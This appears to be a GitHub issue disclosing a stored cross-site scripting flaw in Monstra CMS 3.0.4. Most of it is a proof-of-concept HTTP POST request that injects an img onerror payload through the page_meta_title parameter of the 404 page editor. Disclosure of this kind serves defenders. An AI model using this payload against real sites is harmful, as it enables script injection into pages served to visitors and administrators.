404 page have another Stored XSS Vulnerability
PrincyEdward opened this issue · 1 comments
Monstra - version 3.0.4
Exploit uri -> http://localhost/path/admin/index.php?id=pages&action=edit_page&name=error404
Parameter -> page_meta_title
POC:
POST /localhost/path/admin/index.php?id=pages&action=edit_page&name=error404 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://ocalhost/path/monstra/monstra-3.0.4/admin/index.php?id=pages&action=edit_page&name=error404
Content-Type: application/x-www-form-urlencoded
Content-Length: 475
Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17;
Connection: close
Upgrade-Insecure-Requests: 1
csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=error404&old_parent=&page_id=1&page_title=error404+&page_name=error404&page_meta_title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=&templates=index&status=published&access=public&editor=%3Ch2%3E404+Page+Not+Found%3C%2Fh2%3E%3Cdiv%3EWe%27re+sorry+but+the+page+you+are+looking+for+doesn%27t+appear+to+exist%21%3C%2Fdiv%3E&page_tags=&edit_page=Save&page_date=2012-02-03+17%3A30%3A00
This issue not for MiniCMS